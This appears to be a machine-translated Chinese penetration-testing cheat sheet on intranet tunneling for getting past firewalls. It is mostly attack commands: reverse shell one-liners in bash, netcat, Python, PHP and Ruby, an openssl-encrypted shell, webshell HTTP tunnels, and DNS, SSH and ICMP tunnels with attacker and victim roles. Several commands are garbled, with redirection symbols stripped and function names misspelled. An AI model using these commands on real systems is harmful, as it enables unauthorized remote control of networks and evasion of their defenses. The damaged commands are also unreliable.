内网隧道穿透

1 场景介绍

1.1 相关概念

Intranet penetration is: using various tunneling technologies to find protocols allowed by the firewall, intersperse in normal traffic, bypass the blockade of the network firewall, and achieve access to the blocked target network.

Encapsulated packets are routed between two endpoints of the tunnel through a public Internet network. The logical path through which encapsulated data packets pass when they are passed on the public Internet is called a tunnel. Once the network endpoint is reached, the data will be unpacked and forwarded to the final destination. Note that tunneling technology refers to the entire process including data encapsulation, transmission and unpacking.

The main functions of the tunnel protocol include:规避防火墙and加密网络流量.

Common tunnels are listed as follows:

Application layer: SSH, HTTP, HTTPS, DNS.

Transport layer: TCP, UDP, regular port forwarding.

Network layer: IPv6, ICMP, GRE.

1.2 正向代理 反向代理

In the forward proxy, proxy and client belong to the same LAN and are transparent to the server;

In the reverse proxy, proxy and server belong to the same LAN and are transparent to the client. In fact, what proxy does in both proxies is to send and receive requests and responses on behalf of others, but from a structural perspective, it is just interchangeable between left and right, so the former proxy method is called forward proxy, and the latter is called reverse proxy.

1.2.1 正向代理

Lhost - proxy - Rhost

In order to access Rhost, Lhost sends a request to proxy and specifies that the target is Rhost. Then proxy forwards the request to Rhost and returns the obtained content to Lhost. Simply put, the forward proxy is proxy instead of us to access Rhost.

1.2.2 反向代理

Lhost --- proxy --- firewall --- Rhost

In contrast to forward proxy, Lhost only sends ordinary requests to proxy. When it is transferred to proxy, proxy judges itself, and then submits the returned data back. This benefit is that some firewalls can effectively penetrate when only proxy data is allowed to enter and exit.

1.3 转发场景

1.3.1 常见的场景

安全运维: Bypass the fortress or firewall to achieve remote management of intranet servers

内网渗透: Bypassing the fortress or firewall to attack the intranet server

The target is at the network boundary, and both internal and external networks can be accessed. The host on the network boundary does not have a firewall installed, and all ports are open to the Internet. Such business scenarios rarely appear.

The target is in the intranet, allowing specific application layer protocols to be out of the network (such as HTTP, SSH, DNS) and other application layer protocols (3389, 22, 445, 53, 80, 443, etc.).

The target is in the intranet and cannot access the external network, but can access the boundary host. The firewall policy restricts the external network from directly accessing sensitive ports of the intranet (3389, 22, 445, etc.).

Common forwarding methods:

Rebound port

Rebound shell

socks agent

1.3.2 防火墙规则

Join the Internet

Specific port mapping 80:80

Go out of the Internet

ICMP

Allow specific protocols (HTTP, DNS, SSH, RDP)

Allow specific ports (first the mainstream port, then the full port)

1.3.3 连通性检测

Before establishing a tunnel, the first thing to do is to check whether the target machine can leave the network and what protocol can be made. Manual detection is more troublesome, so this tool is available, which can be used for batch detection with horizontal tools such as wmiexec and psexec. This tool can echo the intranet IP address and computer name in dnslog, which can realize the rapid positioning of the intranet and the outbound machine.

Tools: https://github.com/uknowsec/SharpNetCheck

1

2

3

Usage: SharpNetCheck -dns -host ceye.io

SharpNetCheck -http -host/ip ceye.io

SharpNetCheck -all -host ceye.io

2 反弹 shell

2.1 Bash

2.1.1 Bash TCP

1

2

3

4

5

bash -i /dev/tcp/ip/port 01

bash -i /dev/tcp/ip/port 0 21

exec 5/dev/tcp/ip/port;cat 5 | while read line; do $line 25 5; done

exec /bin/sh 0/dev/tcp/ip/port 10 20

0196;exec 196/dev/tcp/ip/port; sh 196 196 2196

2.1.2 Bash UDP

1

2

3

4

5

Victim:

sh -i /dev/udp/10.0.0.1/4242 01

Listener:

nc -u -lvp 4242

2.2 应用内反弹 shell

2.2.1 netcat

1

2

3

4

ncat ip port -e /bin/bash

nc -e /bin/bash ip port

rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 21|nc ip port /tmp/f

rm -f x; mknod x p nc ip port0x | /bin/bash 1x

2.2.2 python

1

2

3

4

python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(('ip',port));os.dup2(s.fileno(),0);os.dup2(s.fileno(),1);os.dup2(s.fileno(),2);p=subprocess.call(['/bin/sh','-i']);'

# windows only

python -c 'import socket,subprocess,os,pty;s=socket.socket(socket.AF_INET6,socket.SOCK_STREAM);s.connect(('dead:beef:2:125c',port,0,2));os.dup2(s.fileno(),0);os.dup2(s.fileno(),1);os.dup2(s.fileno(),2);p=pty.spawn('/bin/sh');'

Tips in Python environment

Convert to an interactive shell: python -c 'import pty;pty.spawn('/bin/bash')'

Fully interactive shell:

1

2

3

4

5

6

7

$ python -c 'import pty; pty.spawn('/bin/bash')'

Ctrl-Z

$ stty raw -echo

$ fg

$ reset

$ export SHELL=bash

//$ export TERM=xterm-256color

2.2.3 PHP

1

2

3

4

5

php -r '$sock=fsocopen('ip',port);exec('/bin/sh -i 3 3 23');'

php -r '$s=fsocopen('ip',port);$proc=proc_open('/bin/sh -i', array(0=$s, 1=$s, 2=$s),$pipes);'

php -r '$s=fsocopen('ip',port);shell_exec('/bin/sh -i 3 3 23');'

2.2.4 Ruby

1

2

3

4

ruby -rsocket -e'f=TCPSocket.open('ip',port).to_i;exec sprintf('/bin/sh -i %d %d 2%d',f,f,f)'

# windows only

ruby -rsocket -e 'c=TCPSocket.new('ip','port'); while(cmd=c.gets); IO.popen(cmd,'r'){|io|c.print io.read}end'

2.3 openssl 流量加密

1

2

3

4

5

6

7

8

9

10

11

12

13

14

15

16

17

18

19

20

twenty one

twenty two

# VPS generates public-private key pairs for SSL certificates

openssl req -x509 -newkey rsa:4096 -keyout key.pem -out cert.pem -days 365 -nodes

# Listen to rebound shell in VPS

openssl s_server -quiet -key key.pem -cert cert.pem -port 4433

# Use openssl to encrypt the shell's traffic on the target (linux)

mkfifo /tmp/s; /bin/sh -i /tmp/s 21 | openssl s_client -quiet -connect IP:port /tmp/s; rm /tmp/s

#windows

openssl s_client -quiet -connect [ip]:[port1] | cmd.exe | openssl s_client -quiet -connect [ip]:[port2]

# The above command will get the command from [ip]:[port1] and send it to cmd.exe for execution, and then return the result to [ip]:[port2]

# Therefore, two s_servers need to be started on this machine

# Send commands from port1 to cmd

openssl s_server -quiet -key key.pem -cert cert.pem -port [port1]

# Get the command execution result sent to port1 from port2

openssl s_server -quiet -key key.pem -cert cert.pem -port [port2]

2.4 All in One

The following are several websites that automatically generate rebound shell commands:

https://mrxn.net/reverse_shell.php

https://ares-x.com/tools/reverse-shell/

An online encoding website that prevents special characters from being filtered, can also be used in the payload of java.lang.Runtime.exec():

http://www.jackson-t.ca/runtime-exec-payloads.html

3 应用层隧道

3.1 HTTP 隧道

3.1.1 reGeorg

建议使用 nosocket 版Tool address: https://github.com/sensepost/reGeorg

How to use:

Upload tunnel file

Server run: python reGeorgSocksProxy.py -p 8080 -u http://ip:port/tunnel/tunnel.jsp

3.1.2 Neo-reGorg

Tool address: https://github.com/L-codes/Neo-reGeorg

Neo-reGeorgis a project that refactors reGeorg, with the purpose of:

Improve tunnel connection security

Improve availability and avoid feature detection

Improve the confidentiality of transmission content

Coping with more network environment scenarios

How to use:

Set password to generate tunnel.(aspx|ashx|jsp|jspx|php) and upload to WEB server: python3 neoreg.py generate -k password

Use neoreg.py to connect to the WEB server and establish a socks5 proxy locally: python3 neoreg.py -k password -u http://xx/tunnel.php

Notice

Note that if your tools, such as nmap, do not support socks5 proxy settings, please use proxychains, etc.

3.1.3 其它

Tunna

1

2

3

4

5

6

7

# -u Remote proxy script address

# -l represents the port of local listening

# -r Remote map port

# -v Output detailed data

# -a The host address of the agent's remote connection

python proxy.py -u http://ip/conn.aspx -l 1080 -v

python proxy.py -u http://ip/conn.aspx -l 5555 -r 8080 -s -v -n

abptts

pystinger

…

3.2 SSH 隧道

Reference: https://3nd.xyz/AD-Pentest/AD-Pentest-Hidden-Tunnel/

3.2.1 本地端口转发

Enable port traffic forwarding function on local host

For example: Execute on the intruder host (execute active connection on VPS)

1

ssh -L 8866:192.168.10.3:23 -fN 192.168.10.2

3.2.2 远程端口转发

Turn on port traffic forwarding function on remote host

For example: execute on a fortress (return connection is performed on a boundary host)

1

ssh -R 8866:192.168.10.3:23 -fN 192.168.10.1

3.2.3 动态转发 - Socket

Turn on the dynamic traffic forwarding function on the local host and configure the proxy

For example: Execute on the intruder host

1

ssh -D 1100 -fN 192.168.10.2

3.3 DNS 隧道

Tools DNScat2

Various compiled versions: https://downloads.skullsecurity.org/dnscat2/

3.3.1 配置解析记录

Add an A record to the DNS resolution record with the name ns1 value VPS IP address

Add another NS record with the name of any subdomain name, pointing to the address ns1.yourdomain.com

3.3.2 安装 dnscat2 服务端

1

2

3

4

5

6

7

apt-get install gem

apt-get install ruby-dev

apt-get install libpq-dev

apt-get install ruby-bundler

apt-get install git

git clone https://github.com/iagox86/dnscat2

bundle install

3.3.3 启动服务端

1

ruby ./dnscat2.rb dnscat.yuming.com -e open -c mima --no-cache

3.3.4 启动客户端

1

2

3

4

5

# Test whether communication can be done

dnscat-client.exe -ping dnscat.yuming.com

# connect

dnscat-client.exe --dns domain=dnscat.yuming.com -secret mima

4 传输层

SOCKS4 supports TCP protocols such as telnet, FTP, HTTP, etc.

SOCKS5 supports TCP and UDP, and supports security authentication solutions

4.1 FRP

frp is written in Golang and supports cross-platform. You only need to download the binary files of the corresponding platform to execute. Tool address: https://github.com/fatedier/frp

To write a configuration file, start the server first through ./frps -c ./frps.ini, and then start the client through ./frpc -c ./frpc.ini.

The server is deployed on a server with public IP, and the client is placed on the springboard server where we have permissions. Both ends need to configure the configuration file.

4.1.1 服务端

1

2

3

4

5

6

7

8

9

10

[common]

# frp server port

bind_port=7000

# Dashboard port

dashboard_port=8888

# frp server password

token=123456

#Dashboard default account password

dashboard_user=admin

dashboard_pwd=admin

Start FRP: frps -c frps.ini

4.1.2 客户端

1

2

3

4

5

6

7

8

9

10

11

12

[common]

server_addr=VPS IP

server_port=7000

# Align with vps

token=123456

[ssh]

type=tcp

local_ip=127.0.0.1

local_port=22

remote_port=7000

use_encryption=true

use_compression=true

4.2 iox

iox is a port forwarding intranet proxy tool with functions similar to lcx/ew, but better than them.

Tool address: https://github.com/EddieIvan01/iox

4.2.1 端口转发

1

2

3

4

5

6

7

8

# Port Forwarding - Go from local 8888 to 9999

./iox fwd -l 8888 -l 9999

# Port Forwarding - Forward traffic from local 8888 to 1.1.1.1:9999

./iox fwd -l 8888 -r 1.1.1.1:9999

# Connections 1.1.1.1:8888 and 1.1.1.1:9999, forwarding between two connections

./iox fwd -r 1.1.1.1:8888 -r 1.1.1.1:9999

4.2.2 代理

1

2

3

4

5

6

7

8

9

10

11

12

13

14

15

# Start Socks5 service locally 0.0.0.0:1080 - Forward proxy

./iox proxy -l 1080

# Reverse proxy

# Turn on the Socks5 service on the controlled machine and forward the service to the public network VPS

./iox proxy -r 1.1.1.1:9999

# Forward 0.0.0.0:9999 to 0.0.0.0:1080 on VPS

# You must use two commands in pairs because it contains a simple protocol to control the back connection

./iox proxy -l 9999 -l 1080 //Note that these two ports are in sequence

# Then connect to the intranet host

# socks5://1.1.1.1:1080

proxychains rdesktop 192.168.0.100:3389

4.3 sSocks

sSocks is a socks proxy tool set that can be used to enable socks proxy services, support socks5 verification, support IPV6 and UDP, and provide reverse socks proxy services. That is, to use remote computers as socks proxy servers to bounce back to the local area, greatly facilitating intranet penetration testing.

Tool address: http://sourceforge.net/projects/ssocks/

Forward proxy

1

./ssocksd --bind 192.168.172.131 --port 1080

Reverse proxy

1

2

3

4

5

# Attacker machine listening 6020 port forwarding to 6010

./rcsocks -l 6020 -p 6010 -vv

# Victim reverse connection to proxy host 6010 port

./rssocks -s Attacker IP:6010 -vv

5 网络层

5.1 ICMP Tunnel

Tool name: ICMPSH

5.1.1 服务端

The server needs to close ICMP echo: sysctl -w net.ipv4.icmp_echo_ignore_all=1

Install the server:

1

2

apt-get install python-impacket

python icmpsh_m.py native IP target machine public network IP

5.1.2 客户端

1

icmpsh.exe -t Target IP -d 500 -b 30 -s 128